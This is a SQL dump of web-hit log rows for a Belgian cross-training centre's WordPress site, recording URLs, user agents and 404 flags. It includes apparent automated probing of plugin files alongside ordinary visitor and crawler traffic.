(77424, 1500132375.231285, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/fcchat/default.png', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17'),
(77425, 1500132375.232665, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wpmarketplace/readme.txt', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20'),
(77426, 1500132376.122939, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/user-meta/readme.txt', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24'),
(77427, 1500132376.551700, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/action_hooks.php', '', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3'),
(77428, 1500132376.923855, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/user-avatar/readme.txt', '', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3'),
(77429, 1500132377.044178, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-editor/readme.txt', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30'),
(77430, 1500132377.277857, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cimy-user-extra-fields/README_OFFICIAL.txt', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'),
(77431, 1500132377.282445, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/resume-submissions-job-postings/installer.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1'),
(77432, 1500132377.284577, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/ckeditor-for-wordpress/ckeditor.config.js', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'),
(77433, 1500132379.269676, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/category-grid-view-gallery/cat_grid.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6'),
(77434, 1500132381.407309, 1742919172, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1'),
(77435, 1500132382.047506, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/nmedia-user-file-uploader/readme.txt', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1'),
(77436, 1500132384.169593, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/nextgen-gallery/changelog.txt', '', 'Mozilla/5.0 (X11; CrOS i686 12.433.109) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30'),
(77437, 1500132384.610040, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mac-dock-gallery/bugslist.txt', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24'),
(77438, 1500132384.610764, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/font-uploader/font-uploader-free.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.809.0 Safari/535.1'),
(77439, 1500132386.444777, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/gallery-plugin/gallery-plugin.php', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'),
(77440, 1500132386.726088, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/front-end-upload/destination.php', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30'),
(77441, 1500132386.817180, 1742919169, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-dropbox-upload-form/', '', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1'),
(77442, 1500132387.322519, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/custom-content-type-manager/index.html', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3'),
(77443, 1500132387.890860, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wpmarketplace/readme.txt', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11'),
(77444, 1500133992.457753, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/front-end-upload/destination.php', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'),
(77445, 1500135301.947701, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/user-photo/admin.css', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30'),
(77446, 1500137497.721433, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77447, 1500141472.782129, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77448, 1500141473.234207, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77449, 1500141473.629356, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77450, 1500141474.174248, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77451, 1500141474.617095, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77452, 1500141475.004887, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77453, 1500141475.429254, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77454, 1500141475.854646, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77455, 1500141476.251935, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77456, 1500141476.664564, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77457, 1500141477.072376, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77458, 1500141477.547467, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77459, 1500141477.967942, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77460, 1500141478.392280, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77461, 1500141792.653813, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77462, 1500143818.911298, 3512711551, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(77463, 1500143929.598735, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77464, 1500143930.058975, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77465, 1500143930.472962, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77466, 1500143930.946919, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77467, 1500143931.416510, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77468, 1500143931.873426, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77469, 1500143932.302236, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77470, 1500143932.745861, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77471, 1500143933.213198, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77472, 1500143933.717805, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77473, 1500143934.122266, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77474, 1500143934.600501, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77475, 1500143935.009343, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77476, 1500143935.405508, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77477, 1500146844.016289, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77478, 1500146844.506213, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77479, 1500146844.908854, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77480, 1500146845.373779, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77481, 1500146845.831279, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77482, 1500146846.431934, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77483, 1500146846.864511, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77484, 1500146847.454619, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77485, 1500146848.216765, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77486, 1500146848.999717, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77487, 1500146849.403256, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77488, 1500146849.895706, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77489, 1500146850.581227, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77490, 1500146851.036273, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77491, 1500147279.986612, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77492, 1500147280.663133, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77493, 1500147281.598759, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77494, 1500147282.946401, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77495, 1500147283.450816, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77496, 1500147284.083916, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77497, 1500147284.488747, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77498, 1500147285.112635, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77499, 1500147285.529168, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77500, 1500147285.984901, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77501, 1500147286.488448, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77502, 1500147287.149917, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77503, 1500147287.548995, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77504, 1500147287.945715, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77505, 1500148097.459065, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; +http://jooble.org/jooble-bot)'),
(77506, 1500148996.738328, 2745986569, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77507, 1500149005.117189, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77508, 1500149014.426093, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77509, 1500149021.851158, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77510, 1500149022.228052, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77511, 1500149022.601409, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77512, 1500149029.721429, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77513, 1500149036.399647, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77514, 1500149042.581732, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77515, 1500151559.425346, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77516, 1500152691.883179, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; Windows NT 6.1; WOW64; +http://jooble.org/jooble-bot) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36'),
(77517, 1500152692.496648, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; Windows NT 6.1; WOW64; +http://jooble.org/jooble-bot) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36'),
(77518, 1500156328.225093, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(77519, 1500156328.707674, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77520, 1500156329.135244, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77521, 1500156329.533931, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77522, 1500156330.000812, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77523, 1500156330.371269, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77524, 1500156330.754265, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77525, 1500156331.217378, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77526, 1500156331.707814, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77527, 1500156332.096524, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77528, 1500156332.494687, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77529, 1500156332.932274, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77530, 1500156333.327787, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77531, 1500156333.743661, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77532, 1500157018.611217, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77533, 1500160989.889658, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77534, 1500162164.632277, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; +http://jooble.org/jooble-bot)'),
(77535, 1500163340.177530, 3475901892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77536, 1500163431.537554, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77537, 1500176790.464959, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(77538, 1500176790.871486, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(77539, 1500183535.128524, 3301852133, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
